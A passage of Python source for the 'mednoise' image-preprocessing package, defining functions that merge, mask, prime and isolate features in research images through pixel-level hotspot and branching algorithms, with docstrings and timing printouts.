8P' 8I 8I `Y8888P"Y888P"Y8888P"`Y88P' 8I `Y8P"Y8888P" 8P""Y8P' "YY8P8P888P"Y888
#############################################################################################
Copyright 2021 Ravi Bandaru
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this package except in compliance with the License.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#############################################################################################
Welcome to mednoise, a python package that contains algorithms to handle and pre-process
large amounts of image-based metadata to remove noise and enhance the accuracy of machine
learning and deep learning models for scientific research.
#############################################################################################
You can bring up the help menu (h) or exit (e).
"""
print(logo)
response = input(" ")
print(" #############################################################################################")
print("")
if response == "e":
print(" exiting.")
if response == "h":
print(" documentation can be accessed at https://mednoise.github.io/documentation.")
print("")
print(" #############################################################################################")
if header != True and header != False:
raise ValueError('header argument was incorrectly specified. note that it is a boolean attribute.')
about(header=True)
def manual_merge(filepath, find = (0,0,0), replace = (255,255,255)):
"""
Combines multiple input images of the same size to yield one binary image that allows for
common feature detection.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
    find : RGB tuple, default: (0,0,0)
        A value that indicates silenced noise, usually the background color of
        the input image, often ``(0,0,0)``.
    replace : RGB tuple, default: (255,255,255)
        A value that indicates complete noise, usually the complement of the
        background color of the input image, often ``(255,255,255)``.
Notes
-----
This allows users to find common features and then pass them through their own package scripts,
or predeveloped scripts like ``md.manual_find`` and ``md.manual_edit``.
Examples
--------
    >>> md.manual_merge("/example/directory/*", (0,0,0), (255, 0, 0)) #for 4 images, yielding the below image
md.manual_merge - Image 1 Importing:0:00:01
    md.manual_merge - Image 2 Importing:0:00:01
    md.manual_merge - Image 1 Pixel Cleaning:0:00:00
md.manual_merge - Image 2 Pixel Cleaning:0:00:00
md.manual_merge - Image 1 and 2 Pixel Merge:0:00:50
md.manual_merge - Image 3 Pixel Merge:0:00:59
md.manual_merge - Image 4 Pixel Merge:0:00:51
md.manual_merge - Final Merge and Conversion:0:00:50
md.manual_merge - Image Save:0:00:01
.. figure:: combined_image.png
:scale: 50 %
:align: center
``md.manual_merge`` output image
"""
files = glob.glob(filepath)
original = []
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[0])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 1 Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image2 = Image.open(files[1])
rgb2 = image2.convert('RGB')
pixel_values2 = list(rgb2.getdata())
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 2 Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 1 Pixel Cleaning:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values2):
if item != find:
pixel_values2[index] = 2
else:
pixel_values2[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 2 Pixel Cleaning:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
    for index in range(len(pixel_values1)):
        print(round((100 * index) / (width * height), 1), end="\r")
        if pixel_values1[index] == 1 and pixel_values2[index] == 1:
            original.append(1)
        else:
            original.append(2)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_merge - Image 1 and 2 Pixel Merge:" + str(durationTime))
i=1
for index,item in enumerate(files):
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[index])
rgb1 = image.convert('RGB')
pixel_values1 = list(rgb1.getdata())
width, height = rgb1.size
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
        for index in range(len(pixel_values1)):
            print(round((100 * index) / (width * height), 1), end="\r")
            if pixel_values1[index] == 1 and original[index] == 1:
                original[index] = 1
            else:
                original[index] = 2
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
        print("md.manual_merge - Image " + str(i) + " Pixel Merge:" + str(durationTime))
i+=1
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(original):
print(round((100*index)/(width*height),1), end = "\r")
if original[index]== 1:
original[index] = find
else:
original[index] = replace
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.manual_merge - Final Merge and Conversion:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(original)
image_out.save('combined_image.png')
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.manual_merge - Image Save:" + str(durationTime))
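# The pixel-merge rule implemented above can be sketched on two tiny,
# hypothetical images (flat lists of RGB tuples): a pixel stays silenced only
# if it equals `find` in every input image, otherwise it is marked with
# `replace`. The images and colours below are illustrative only:

```python
find = (0, 0, 0)        # silenced / background colour
replace = (255, 0, 0)   # colour marking any detected feature
img_a = [(0, 0, 0), (9, 9, 9), (0, 0, 0), (0, 0, 0)]
img_b = [(0, 0, 0), (0, 0, 0), (7, 7, 7), (0, 0, 0)]
merged = [find if a == find and b == find else replace
          for a, b in zip(img_a, img_b)]
print(merged)  # -> [(0, 0, 0), (255, 0, 0), (255, 0, 0), (0, 0, 0)]
```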
def manual_find(filepath):
"""
Offers an interface through tkinter to identify pixel coordinates and create tuple-lists that can be passed through a filter.
Parameters
----------
filepath : string
A filepath for images to be selected from. Must be a path to a file, not a directory or other ``glob`` parseable structure.
Notes
-----
This allows users to find polygon coordinates and then pass them through their own package scripts,
or predeveloped scripts like ``md.manual_edit``.
Examples
--------
>>> md.manual_find("/example/directory/file.png") #after four clicks on the tkinter interface
(51,78),
(51,275),
(7,261),
(8,78),
"""
window = tk.Tk()
window.title("Pixel Finder")
window.geometry("960x720")
window.configure(background='grey')
img = ImageTk.PhotoImage(Image.open(filepath))
panel = tk.Label(window, image = img)
panel.pack(side = "bottom", fill = "both", expand = "yes")
def pressed1(event):
print("(" + str(event.x) + "," + str(event.y) + ")" + ",")
window.bind('<Button-1>', pressed1)
window.mainloop()
def manual_edit(filepath, xy, find = (0,0,0)):
"""
Offers a manual method through which sections of input images can be silenced.
Parameters
----------
filepath : string
A filepath for images to be selected from. Must be a path to a file, not a directory or other ``glob`` parseable structure.
xy : tuple
A tuple of restraint tuples for the polygon to be silenced. This can be either generated
by setting the output of ``md.manual_find`` to a list or developing your own algorithm.
    find : RGB tuple, default: (0,0,0)
        A value that indicates silenced noise, usually the background color of
        the input image, often ``(0,0,0)``.
Notes
-----
This allows users to silence polygon coordinates after then pass them through their own package scripts,
or predeveloped scripts like ``md.manual_merge`` or ``md.manual_find``.
Examples
--------
>>> restraints = [(473,91),(214,601),(764,626)]
>>> md.manual_edit("/example/directory/file.png", xy = restraints) #removing a triangle from input image
md.manual_edit - Image 1 Save:0:00:01
.. figure:: edited.png
:scale: 50 %
:align: center
``md.manual_edit`` output image
"""
files = glob.glob(filepath)
restraints = xy
for index,item in enumerate(files):
with Image.open(files[index]) as im:
startTime = datetime.datetime.now().replace(microsecond=0)
name = ntpath.basename(files[index])
size = len(name)
mod_string = name[:size - 4]
print(mod_string)
draw = ImageDraw.Draw(im)
draw.polygon(restraints, fill=find, outline=find)
im.save(mod_string + "_clean" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.manual_edit - Image " + str(index+1) + " Save:" + str(durationTime))
def manual_primer(filepath, find = (0,0,0)):
"""
Creates one binary image from an input image that allows for common feature detection.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``, it can take any argument that ``glob`` can parse through.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
This function is almost entirely useless without an outside algorithm that a user develops. **mednoise**
is already optimized to not require primed images, so this function instead serves as a tool for user
developed algorithms that have not been optimized.
Examples
--------
>>> md.manual_primer("/example/directory/*")
md.manual_primer - Importing Images:0:00:00
md.manual_primer - Image 1 Importing:0:00:01
md.manual_primer - Image 1 Cleaning:0:00:00
md.manual_primer - Image 1 Conversion:0:00:47
md.manual_primer - Image 1 Image Save:0:00:01
.. figure:: primed.png
:scale: 50 %
:align: center
``md.manual_primer`` output image
"""
replace = (255,255,255)
startTime = datetime.datetime.now().replace(microsecond=0)
files = glob.glob(filepath)
original = []
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Importing Images:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for indexor,item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
pixel_values1 = list(rgb1.getdata())
width, height = image.size
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) +" Cleaning:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
const = (width*height)/100
for index, item in enumerate(pixel_values1):
print(str(round((index)/(const),1)) + "%" , end = "\r")
if pixel_values1[index] == 1:
original.append(find)
else:
original.append(replace)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) +" Conversion:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(original)
image_out.save(mod_string + "_primed" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.manual_primer - Image" + " " + str(indexor+1) + " Image Save:" + str(durationTime))
def hotspot_complete(filepath, x, y, find=(0,0,0)):
"""
Processes input images using a hotspot algorithm,
essentially acting as an intuitive paintbrush across the image.
Allows a user to selectively filter instances of noise based on size.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.hotspot_complete("/example/directory/file.png", 50, 50)
md.hotspot_complete - Image 1 Importing:0:00:01
md.hotspot_complete - Image 1 Converting:0:00:00
md.hotspot_complete - Image 1 Hotspot Calculating:0:00:53
md.hotspot_complete - Image 1 Hotspot Analyzing:0:03:47
md.hotspot_complete - Image 1 Hotspot Isolating:0:00:04
md.hotspot_complete - Image 1 Array Priming:0:00:00
md.hotspot_complete - Image 1 Translating:0:00:00
md.hotspot_complete - Image 1 Saving:0:00:00
.. figure:: isolatedhotspot.png
:scale: 30 %
:align: center
``md.hotspot_complete`` output result
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_complete - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
const = (width*height)/100
store = {}
analyzedval = {}
for w in range (x,width+1):
for h in range (y,height+1):
store[str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)] = pixel_values2[h-y:h, w-x:w]
a=(w-1)*height+h
print(str(round((a)/(const),1)) + "%" , end = "\r")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Hotspot Calculating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for w in range (x,width):
for h in range (y,height):
keytocheck = store.get(str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w))
stringforkey = str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)
if np.sum(keytocheck[0,:]) == x and np.sum(keytocheck[y-1,:]) == x and np.sum(keytocheck[:,0]) == y and np.sum(keytocheck[:,x-1]) == y:
valueforkey = True
else:
valueforkey = False
a=(w-1)*height+h
print(str(round((a)/(const),1)) + "%" , end = "\r")
analyzedval[stringforkey] = valueforkey
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Hotspot Analyzing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
fillmatrix = np.full((y, x), 1)
for key, value in analyzedval.items():
if value == True:
txt = key
splitter = txt.split(", ")
split, splitone = splitter[0], splitter[1]
a = split.split(":")
b = splitone.split(":")
one = int(a[0])
two = int(a[1])
three = int(b[0])
four = int(b[1])
pixel_copy2[one:two, three:four] = fillmatrix
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Hotspot Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
result_list = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if result_list[0][i] == 1:
pixel_values1[i] = find
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_complete - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def hotspot_calculator(filepath, x, y, find = (0,0,0)):
"""
Calculates partition matrices from input images,
essentially dividing the input image into all possible hotspot combinations.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``calculator`` outputs a dictionary, where the key is a 2D array index of
the image's RGB pixel matrix and the value is the submatrix itself from the index key. The dictionary is stored as the global variable ``storeddictionary``.
Examples
--------
>>> md.hotspot_calculator("/example/directory/file.png", 50, 50)
md.hotspot_calculator - Image 1 Importing:0:00:01
md.hotspot_calculator - Image 1 Converting:0:00:01
md.hotspot_calculator - Image 1 Hotspot Calculating:0:00:54
>>> list(storeddictionary.items())[:4]
[('0:50, 0:50', array([[2, 2, 2, ..., 2, 2, 2],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]])), ('1:51, 0:50', array([[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]])), ('2:52, 0:50', array([[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]])), ('3:53, 0:50', array([[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
...,
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1],
[2, 2, 2, ..., 1, 1, 1]]))]
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_calculator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_calculator - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
const = (width*height)/100
global storeddictionary
storeddictionary = {}
for w in range (x,width+1):
for h in range (y,height+1):
storeddictionary[str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)] = pixel_values2[h-y:h, w-x:w]
a=(w-1)*height+h
print(str(round((a)/(const),1)) + "%" , end = "\r")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_calculator - Image " + str(indexor+1) + " Hotspot Calculating:" + str(durationTime))
def hotspot_analyzer(calc=None, filepath = None, x = None, y = None, find = (0,0,0)):
"""
Analyzes partition matrixes from input images,
essentially determining the clinical significance of each spot,
preparing the image for isolation.
Parameters
----------
calc : dictionary
A dictionary to analyze where the key is a 2D array index of the image's RGB pixel matrix and the value is the submatrix itself from the index key.
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works. Note that the ``analyzer`` outputs a dictionary, where the key is a 2D array index of
the image's RGB pixel matrix and the value is boolean, depending on the analysis (see source code for more details) of the input matrices. The dictionary is stored
as the global variable ``analyzedval``.
Examples
--------
>>> md.hotspot_analyzer(calc = storeddictionary, filepath = "/example/directory/file.png", x = 50, y = 50)
md.hotspot_analyzer - Image 1 Importing:0:00:01
md.hotspot_analyzer - Image 1 Hotspot Analyzing:0:02:22
>>> list(analyzedval.items())[:4]
[('0:50, 0:50', False), ('1:51, 0:50', False), ('2:52, 0:50', False), ('3:53, 0:50', False)]
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_analyzer - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
global analyzedval
analyzedval = {}
for w in range (x,width):
for h in range (y,height):
keytocheck = calc.get(str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w))
stringforkey = str(h-y)+":"+str(h)+", "+str(w-x)+":" + str(w)
if np.sum(keytocheck[0,:]) == x and np.sum(keytocheck[y-1,:]) == x and np.sum(keytocheck[:,0]) == y and np.sum(keytocheck[:,x-1]) == y:
valueforkey = True
else:
valueforkey = False
a=(w-1)*height+h
const = (width*height)/100
print(str(round((a)/(const),1)) + "%" , end = "\r")
analyzedval[stringforkey] = valueforkey
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_analyzer - Image " + str(indexor+1) + " Hotspot Analyzing:" + str(durationTime))
def hotspot_isolator(calc=None, filepath = None, x = None, y = None, find = (0,0,0)):
"""
Isolates and silences relevant partition matrixes from input images,
essentially removing noise with unremarkable clinical significance from each image.
Parameters
----------
calc : dictionary
A dictionary to analyze where the key is a 2D array index of the image's RGB pixel matrix and the value is a boolean analysis of noise relevance.
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The width, in pixels, of the hotspot matrix calculator. Think of this as the width of the intuitive paintbrush.
y : integer
The height, in pixels, of the hotspot matrix calculator. Think of this as the height of the intuitive paintbrush.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.hotspot_isolator(calc = analyzedval, filepath = "/example/directory/file.png", x = 50, y = 50)
md.hotspot_isolator - Image 1 Converting:0:00:00
md.hotspot_isolator - Image 1 Importing:0:00:02
md.hotspot_isolator - Image 1 Hotspot Isolating:0:00:04
md.hotspot_isolator - Image 1 Array Priming:0:00:00
md.hotspot_isolator - Image 1 Translating:0:00:00
md.hotspot_isolator - Image 1 Saving:0:00:00
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
conversionStart = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - conversionStart
print("md.hotspot_isolator - Image " + str(indexor+1) + " Converting:" + str(durationTime))
pixel_copy = pixel_values1
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.hotspot_isolator - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
fillmatrix = np.full((y, x), 1)
for key, value in calc.items():
if value == True:
txt = key
splitter = txt.split(", ")
split, splitone = splitter[0], splitter[1]
a = split.split(":")
b = splitone.split(":")
one = int(a[0])
two = int(a[1])
three = int(b[0])
four = int(b[1])
pixel_copy2[one:two, three:four] = fillmatrix
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Hotspot Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
result_list = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Array Priming:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = list(rgb1.getdata())
for i in range(0,width*height):
if result_list[0][i] == 1:
pixel_values1[i] = find
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
image_out = Image.new("RGB",(width,height))
image_out.putdata(pixel_values1)
image_out.save(mod_string + "_isolated" + ".PNG")
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.hotspot_isolator - Image " + str(indexor+1) + " Saving:" + str(durationTime))
def branch_complete(filepath, x, y, find = (0,0,0), iterations=100):
"""
Processes input images using a branching algorithm,
essentially acting as an intuitive selector of a figure in the image.
Allows a user to selectively filter one instance of clinical relevance.
Parameters
----------
filepath : string
A filepath for images to be selected from. Since **mednoise** uses ``glob``,
it can take any argument that ``glob`` can parse through.
x : integer
The horizontal location, in pixels, of any relevant pixel on the image.
y : integer
The vertical location, in pixels, of any relevant pixel on the image.
find : RGB tuple, default: (0,0,0)
A value that indicates silenced noise. Usually is considered the
background color of the input image, often ``(0,0,0)``.
iterations : integer, default: 100
The number of branching algorithms to run. The higher this value, the farther the pixels will branch out, and the more likely you are to get a noise-free image.
Notes
-----
See ``mednoise`` API explanations to understand how this algorithm works.
Examples
--------
>>> md.branch_complete("/example/directory/file.png", 450, 350, iterations = 500)
.. figure:: isolatedbranch.png
:scale: 30 %
:align: center
``md.branch_complete`` output result
"""
files = glob.glob(filepath)
for indexor, item in enumerate(files):
name = ntpath.basename(files[indexor])
size = len(name)
mod_string = name[:size - 4]
startTime = datetime.datetime.now().replace(microsecond=0)
image = Image.open(files[indexor])
rgb1 = image.convert('RGB')
width, height = image.size
pixel_values1 = list(rgb1.getdata())
pixel_copy = pixel_values1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print ("md.branch_complete - Image " + str(indexor+1) + " Importing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
for index, item in enumerate(pixel_values1):
if item != find:
pixel_values1[index] = 2
else:
pixel_values1[index] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Converting:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
pixel_values1 = np.array(pixel_values1)
shape = (height, width)
global pixel_values2
pixel_values2 = np.reshape(pixel_values1, shape)
pixel_copy2 = np.reshape(pixel_copy, shape)
global coords
coords = []
const = (width*height)/100
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Translating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
proximal_brancher(coords, y,x)
global coordsfinal
coordsfinal = []
i = 0
global diflist
diflist = coords
while i != iterations:
coordsfinalinit = []
filteredcoords = []
print(str(round((i*100)/(iterations),1)) + "%", end = "\r")
for index, item in enumerate(diflist):
txt = str(diflist[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
proximal_brancher(coordsfinal, newy, newx)
for index, item in enumerate(coordsfinal):
coordsfinal[index] = str(coordsfinal[index])
for index, item in enumerate(coords):
coords[index] = str(coords[index])
diflist = list(set(coordsfinal) - set(coords))
coords = list(coordsfinal)
i += 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Branching:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
g = []
a = list(set(coords))
for index, item in enumerate(a):
print(str(round((index*100)/(len(coords)),1)) + "%", end = "\r")
txt = str(a[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
if manual_checker(newy, newx) == 2:
g.append([newy, newx])
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Branch Analyzing:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
complement = []
for w in range(width):
for h in range(height):
complement.append([h,w])
setc = {tuple(item) for item in g}
finalset = [item for item in complement if tuple(item) not in setc]
for index, item in enumerate(finalset):
txt = str(finalset[index])
newstr = txt.replace("[", "")
finalstr = newstr.replace("]", "")
splitter = finalstr.split(", ")
newy, newx = splitter[0], splitter[1]
newx = int(newx)
newy = int(newy)
pixel_copy2[newy,newx] = 1
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
print("md.branch_complete - Image " + str(indexor+1) + " Branch Isolating:" + str(durationTime))
startTime = datetime.datetime.now().replace(microsecond=0)
result = pixel_copy2.reshape([1, width*height])
result_list = result.tolist()
endTime = datetime.datetime.now().replace(microsecond=0)
durationTime = endTime - startTime
